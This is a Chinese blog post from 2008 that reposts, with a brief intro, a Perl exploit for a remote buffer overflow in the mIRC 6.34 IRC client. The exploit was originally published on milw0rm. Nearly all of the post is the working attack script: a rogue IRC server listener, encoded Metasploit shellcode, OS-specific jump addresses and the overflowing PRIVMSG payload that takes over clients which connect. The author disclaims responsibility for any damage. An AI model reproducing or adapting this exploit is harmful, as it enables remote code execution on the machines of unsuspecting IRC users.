mIRC 6.34 远程缓冲区溢出漏洞利用工具-夜火博客

2008年10月06日 08:58:26

mIRC 6.34 远程缓冲区溢出漏洞利用工具

好久没给大家提供漏洞类的东西了，这个blog都快成软件类blog了，究其原因，是因为夜火我技术太菜了，很多漏洞看不懂，看不懂的我也懒得发，以免过多的人说俺装B。

但是也不能不发吧，发出来的文章，技术深度肯定要浅些的，甚至不用太多技术。比如直接的利用工具，这篇文章就是。

mIRC 6.34 Remote Buffer Overflow Exploit
mIRC 6.34 远程缓冲区溢出漏洞利用工具

#!/usr/bin/perl
#
#
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat <at> hotmail <.> com)
# —————————————-
# A day’s work of debugging and looking at mIRC.
#
# Tested on Windows XP SP3 English and Windows Vista SP0.
#
# Credits to securfrog for publishing the PoC.
#
# Author has no responsibility over the damage you do with this!
#
# Note: You might change the addresses for Vista ;)
#
# —————————————-

use IO::Socket;

if(!($ARGV[1]))
{
print “ [x] mIRC 6.34 Remote Buffer Overflow Exploit ”;
print “[x] Exploit by SkD (skdrat@ hotmail.com) ”;
print “[x] Use: mirc_exp.pl <port> <OS = 1 for XP Sp3 AND 2 for Vista SP0> [x] Example: mirc_exp.pl 6667 0 ”;
exit;
}

while(1)
{

my $sock=new IO::Socket::INET (
Listen => 1,

LocalAddr => ‘127.0.0.1′,

LocalPort => $ARGV[0],

Proto => ‘tcp’);

die unless $sock;

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
“x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x1e”.
“x95x97xf1x83xebxfcxe2xf4xe2x7dxd3xf1x1ex95x1cxb4″.
“x22x1exebxf4x66x94x78x7ax51x8dx1cxaex3ex94x7cxb8″.
“x95xa1x1cxf0xf0xa4x57x68xb2x11x57x85x19x54x5dxfc”.
“x1fx57x7cx05x25xc1xb3xf5x6bx70x1cxaex3ax94x7cx97″.
“x95x99xdcx7ax41x89x96x1ax95x89x1cxf0xf5x1cxcbxd5″.
“x1ax56xa6x31x7ax1exd7xc1x9bx55xefxfdx95xd5x9bx7a”.
“x6ex89x3ax7ax76x9dx7cxf8x95x15x27xf1x1ex95x1cx99″.
“x22xcaxa6x07x7exc3x1ex09x9dx55xecxa1x76x65x1dxf5″.
“x41xfdx0fx0fx94x9bxc0x0exf9xf6xf6x9dx7dx95x97xf1″;

print “[x] Listening on port “.$ARGV[0].”.. ”;
$s=$sock->accept();
print “[x] Got a user! ”;
$overflow = “x41″ x 307;
$overflow2 = “B” x 12;
$eip_vista = “x66x1cxc2x76″; #Normaliz.DLL pop pop ret
$eip2_vista = “xd3xdbx54x77″; #MSFCT.DLL jmp esp
$eip_xpsp3 = “xd1xfbx92x77″; #SETUPAPI.DLL 0×7792FBD1 pop eax pop ret
$eip2_xpsp3 = “xb7x87x9dx77″; #SETUPAPI.DLL 0×779D87B7 jmp esp
$addr = “xb5xb5xfdx7f”;
$nop_sled = “x90″ x 4;
$jmp = “xEBx03xFFxFF”;

print “[x] Sending packets.. ”;

print $s “:my_irc_server.com 001 wow :Welcome to the Internet Relay Network wow ”;
sleep(1);
if($ARGV[1] == “1″){
print $s “:”.$overflow.$eip_xpsp3.$addr.$nop_sled.$eip2_xpsp3.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled.” PRIVMSG wow : /FINGER wow. ”;
}else{
print $s “:”.$overflow.$eip_vista.$addr.$nop_sled.$eip2_vista.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled.” PRIVMSG wow : /FINGER wow. ”;
}
print “[x] Check it out! ”;
}

# milw0rm.com [2008-10-04]